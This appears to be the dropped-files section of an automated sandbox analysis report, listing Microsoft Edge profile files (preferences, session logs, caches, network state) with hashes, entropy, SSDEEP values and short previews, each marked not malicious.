                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379003729291748","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379003729291748","location":5,"ma

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3d1d8.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):24723
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.56861186921997
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:220BhCWPfCfxD8F1+UoAYDCx9Tuqh0VfUC9xbog/OVA5bcOrwnupItu9R:220BhCWPfCfxDu1jaVFcLnZtc
                                                                                                                                                                                                                                                                                                        MD5:90F193A17F0C6D72CA8803CD03779C8A
                                                                                                                                                                                                                                                                                                        SHA1:98EAC7B99EEBA7CCE56B32AA8724AEE9AF35ED67
                                                                                                                                                                                                                                                                                                        SHA-256:3CD64657BC0012905D1164142F4B46FB98F4EF22D8F59E2278CF53D67CBDA0BB
                                                                                                                                                                                                                                                                                                        SHA-512:98406CD0C774802E1B3D162A0A48E3CA024ABF766F4EC7F68163B6FCF108BE5D20F51FA6495A7E4E885ED9B315F448FDCDF65BAD0EC2BB6A4522ED8B75A04FBB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379003729291748","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379003729291748","location":5,"ma

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):429
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.372948992290691
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:S85aEFljljljljl/2larlIGqrjZD4IEEEEYX1EIaIGqrjZDj:S+a8ljljljljl+CIGqrjZAX1oIGqrjZj
                                                                                                                                                                                                                                                                                                        MD5:95EDD38C472AAF5753564EE0DFFBC9CA
                                                                                                                                                                                                                                                                                                        SHA1:D31267A403AA91636081EE51CBD50899111A2CA8
                                                                                                                                                                                                                                                                                                        SHA-256:B595058109ACF8F1481089E87E77BC23475C6EE8D60E36DFFE7BE082CDAA3E9F
                                                                                                                                                                                                                                                                                                        SHA-512:84C18F502170163D129D5E2200AFE5AA447B0083AFC109D6CC110902BD595415DBDF49862D26B70FAD248029ACE7A474C7054314A11FA99B0DCBA4CB5450CC33
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f..................3d................next-map-id.1.Enamespace-e3dc0814_49a0_4861_9d72_44df88d45629-http://127.0.0.1:8000/.0V.e................V.e................V.e................V.e................V.e..................g.S...............Enamespace-e3dc0814_49a0_4861_9d72_44df88d45629-http://127.0.0.1:8000/

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):322
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.089925509823483
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQwglyq2PsZ23oH+TcwtrQMxIFUt8ORQwW711Zmw+ORQwm9RkwOsZ23oH+Tcwtf:72SvkcYebCFUt8O2311/+O2j751cYebf
                                                                                                                                                                                                                                                                                                        MD5:BABBBB0968956E094EF546424AF40E5F
                                                                                                                                                                                                                                                                                                        SHA1:C3860B63487A3995C4707A5B57360773D85F710F
                                                                                                                                                                                                                                                                                                        SHA-256:14E6FC57330E652CFB48D6A82EBB6FCA4101B43590E2FD5CC8029EF57264AE42
                                                                                                                                                                                                                                                                                                        SHA-512:5A63444BDD2B5DA0906F0C7141EBAD5FAC792208959F27FC6F463E0C5CAB59B86372BCAADE11FCC8FDCCBCF9917D5C07676E7AC5F9029DCEA6313768630E082B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:30.143 1ae0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/18-08:55:30.147 1ae0 Recovering log #3.2024/12/18-08:55:30.152 1ae0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):322
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.089925509823483
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQwglyq2PsZ23oH+TcwtrQMxIFUt8ORQwW711Zmw+ORQwm9RkwOsZ23oH+Tcwtf:72SvkcYebCFUt8O2311/+O2j751cYebf
                                                                                                                                                                                                                                                                                                        MD5:BABBBB0968956E094EF546424AF40E5F
                                                                                                                                                                                                                                                                                                        SHA1:C3860B63487A3995C4707A5B57360773D85F710F
                                                                                                                                                                                                                                                                                                        SHA-256:14E6FC57330E652CFB48D6A82EBB6FCA4101B43590E2FD5CC8029EF57264AE42
                                                                                                                                                                                                                                                                                                        SHA-512:5A63444BDD2B5DA0906F0C7141EBAD5FAC792208959F27FC6F463E0C5CAB59B86372BCAADE11FCC8FDCCBCF9917D5C07676E7AC5F9029DCEA6313768630E082B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:30.143 1ae0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/18-08:55:30.147 1ae0 Recovering log #3.2024/12/18-08:55:30.152 1ae0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379003731632871

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1307
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5242673684186023
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:30o4RrjVOKMNv4d8aEE/KNXeECxG/4lOlZeP6XwQWZMMR:3BgrE3aE/NXelGzlZeiNWt
                                                                                                                                                                                                                                                                                                        MD5:3D48AF8743F6F787DCD02482B2DE94C2
                                                                                                                                                                                                                                                                                                        SHA1:1D9CD9D0EC947C3CCE4EAD70479658918C75B060
                                                                                                                                                                                                                                                                                                        SHA-256:B5C77AFAC86A6A8BBD8B1BA3EA5E52B26F27556A4F3784E07036A51C68178211
                                                                                                                                                                                                                                                                                                        SHA-512:BDE5AE53FAA15621A79A342A02D8694350BFB12559A557805558C16D0E98B6E50D0E8C771615600CCFE2AE89A09A5347647272256E1EF20A867CE39BC794C7E7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SNSS.......7..$...........7..$......"7..$...........7..$.......7..$.......8..$.......8..$....!..8..$...............................7..$8..$1..,...8..$$...e3dc0814_49a0_4861_9d72_44df88d45629...7..$.......8..$....l.R........7..$...7..$.......................7..$....................5..0...7..$&...{901DFCA9-0933-49DD-B8AD-C128D9FD5AE7}.....7..$.......8..$....A..<...8..$....'...http://127.0.0.1:8000/254d3199/72f3a0b3.............!...x...................................................................................................IHQ.)..JHQ.).. .......8...............0.......................................................V...'...h.t.t.p.:././.1.2.7...0...0...1.:.8.0.0.0./.2.5.4.d.3.1.9.9./.7.2.f.3.a.0.b.3...................................8.......0.......8....................................................................... .......................................................P...$...d.7.a.a.1.5.7.9.-.9.9.b.e.-.4.d.9.5.-.9.a.c.e.-.c.c.8.d.2.b.4.7.2.9.9.1.................P...$...3.6

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13379003731778528

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):865
                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.95214533412243
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:39gsxUWM4YX/MTD04gWmlXjWlECOMlYcncecuIlVh+lt8lQEePlUnRUWMWrEPb:36WEE/KNXeECxG/4lOlZeP6Xry
                                                                                                                                                                                                                                                                                                        MD5:51DB173C1FBCAC32E6204398BFA2A5D7
                                                                                                                                                                                                                                                                                                        SHA1:7B89605D0E07161D783E1D83DA5C5A2E1488EB77
                                                                                                                                                                                                                                                                                                        SHA-256:048286D00076DA46ED96BDC02620DCA066485A5375F79F2A0B4B5AD0DF66CD28
                                                                                                                                                                                                                                                                                                        SHA-512:20600C7E15B228F6EC5B1C95ABE728A720E07F6867F50624C54CE1435FA22ED487CA1BFCB19BE5FDB502BA74BF3703992BEC6FEAB112AA6DE44C277ED169172D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SNSS.......9..$........"./.A..<...9..$....'...http://127.0.0.1:8000/254d3199/72f3a0b3.............!...x...................................................................................................IHQ.)..JHQ.).. .......8...............0.......................................................V...'...h.t.t.p.:././.1.2.7...0...0...1.:.8.0.0.0./.2.5.4.d.3.1.9.9./.7.2.f.3.a.0.b.3...................................8.......0.......8....................................................................... .......................................................P...$...d.7.a.a.1.5.7.9.-.9.9.b.e.-.4.d.9.5.-.9.a.c.e.-.c.c.8.d.2.b.4.7.2.9.9.1.................P...$...3.6.6.a.5.0.4.5.-.e.3.6.b.-.4.9.0.d.-.a.e.8.f.-.1.a.b.f.0.a.e.1.7.1.e.1.................'...http://127.0.0.1:8000/254d3199/72f3a0b3........."./....................."./............."./................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):347
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.151840323736089
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQMUAVq2PsZ23oH+Tcwt7Uh2ghZIFUt8ORQMcO0gZmw+ORQM2+NAIkwOsZ23oHT:72MDvkcYebIhHh2FUt8O2Mcu/+O2M1Nl
                                                                                                                                                                                                                                                                                                        MD5:9BBB51715ACFEA8A958D5430BD0FC1E6
                                                                                                                                                                                                                                                                                                        SHA1:40F3B3279BE617CFA313035E1B54842AFEA321FB
                                                                                                                                                                                                                                                                                                        SHA-256:71984DC9D63E5DFBA0490FAAF1B1E1D24A249E6E57DA222FD76C2AED71506C79
                                                                                                                                                                                                                                                                                                        SHA-512:5C94D5C3E08B8039D51A777DC12296A485B17BFA593A332EEC951282AF31C08380BF3BBBC13ABE49C29E86AA363DFB9A6385A5EFBF44AFFE77D209D032326EBE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.382 f74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/18-08:55:33.383 f74 Recovering log #3.2024/12/18-08:55:33.385 f74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):347
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.151840323736089
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQMUAVq2PsZ23oH+Tcwt7Uh2ghZIFUt8ORQMcO0gZmw+ORQM2+NAIkwOsZ23oHT:72MDvkcYebIhHh2FUt8O2Mcu/+O2M1Nl
                                                                                                                                                                                                                                                                                                        MD5:9BBB51715ACFEA8A958D5430BD0FC1E6
                                                                                                                                                                                                                                                                                                        SHA1:40F3B3279BE617CFA313035E1B54842AFEA321FB
                                                                                                                                                                                                                                                                                                        SHA-256:71984DC9D63E5DFBA0490FAAF1B1E1D24A249E6E57DA222FD76C2AED71506C79
                                                                                                                                                                                                                                                                                                        SHA-512:5C94D5C3E08B8039D51A777DC12296A485B17BFA593A332EEC951282AF31C08380BF3BBBC13ABE49C29E86AA363DFB9A6385A5EFBF44AFFE77D209D032326EBE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.382 f74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/18-08:55:33.383 f74 Recovering log #3.2024/12/18-08:55:33.385 f74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old~RF2f34f.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):347
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.151840323736089
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQMUAVq2PsZ23oH+Tcwt7Uh2ghZIFUt8ORQMcO0gZmw+ORQM2+NAIkwOsZ23oHT:72MDvkcYebIhHh2FUt8O2Mcu/+O2M1Nl
                                                                                                                                                                                                                                                                                                        MD5:9BBB51715ACFEA8A958D5430BD0FC1E6
                                                                                                                                                                                                                                                                                                        SHA1:40F3B3279BE617CFA313035E1B54842AFEA321FB
                                                                                                                                                                                                                                                                                                        SHA-256:71984DC9D63E5DFBA0490FAAF1B1E1D24A249E6E57DA222FD76C2AED71506C79
                                                                                                                                                                                                                                                                                                        SHA-512:5C94D5C3E08B8039D51A777DC12296A485B17BFA593A332EEC951282AF31C08380BF3BBBC13ABE49C29E86AA363DFB9A6385A5EFBF44AFFE77D209D032326EBE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.382 f74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/18-08:55:33.383 f74 Recovering log #3.2024/12/18-08:55:33.385 f74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):432
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2084562280711255
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:72Tr+vkcYebvqBQFUt8O22W/+O2yV51cYebvqBvJ:7LkcYebvZg8ORW31cYebvk
                                                                                                                                                                                                                                                                                                        MD5:BA10E5673DA76ED7F30E1D6CD04BA345
                                                                                                                                                                                                                                                                                                        SHA1:A69955FB55097228D573B2B0C1CEBF27610E51DC
                                                                                                                                                                                                                                                                                                        SHA-256:239E5C34E0254DBE9ECFB6A4A0DF82941E2B0EAA1080D5DB9141FE6AAA85BC70
                                                                                                                                                                                                                                                                                                        SHA-512:FB71082EC42328236EE9FEC3D1EE2F320D540FC48C579E21261AD4813BA49E79D8E21C6DC6973AD9D0FD67189749B445EAF99F867603B0C29C64DAD4D4179E2C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:30.180 1c5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/18-08:55:30.195 1c5c Recovering log #3.2024/12/18-08:55:30.204 1c5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):432
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2084562280711255
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:72Tr+vkcYebvqBQFUt8O22W/+O2yV51cYebvqBvJ:7LkcYebvZg8ORW31cYebvk
                                                                                                                                                                                                                                                                                                        MD5:BA10E5673DA76ED7F30E1D6CD04BA345
                                                                                                                                                                                                                                                                                                        SHA1:A69955FB55097228D573B2B0C1CEBF27610E51DC
                                                                                                                                                                                                                                                                                                        SHA-256:239E5C34E0254DBE9ECFB6A4A0DF82941E2B0EAA1080D5DB9141FE6AAA85BC70
                                                                                                                                                                                                                                                                                                        SHA-512:FB71082EC42328236EE9FEC3D1EE2F320D540FC48C579E21261AD4813BA49E79D8E21C6DC6973AD9D0FD67189749B445EAF99F867603B0C29C64DAD4D4179E2C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:30.180 1c5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/18-08:55:30.195 1c5c Recovering log #3.2024/12/18-08:55:30.204 1c5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\8c28583e-2af6-4be8-b8e5-c3bda23a9682.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):61
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                        MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                        SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                        SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                        SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):61
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                        MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                        SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                        SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                        SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

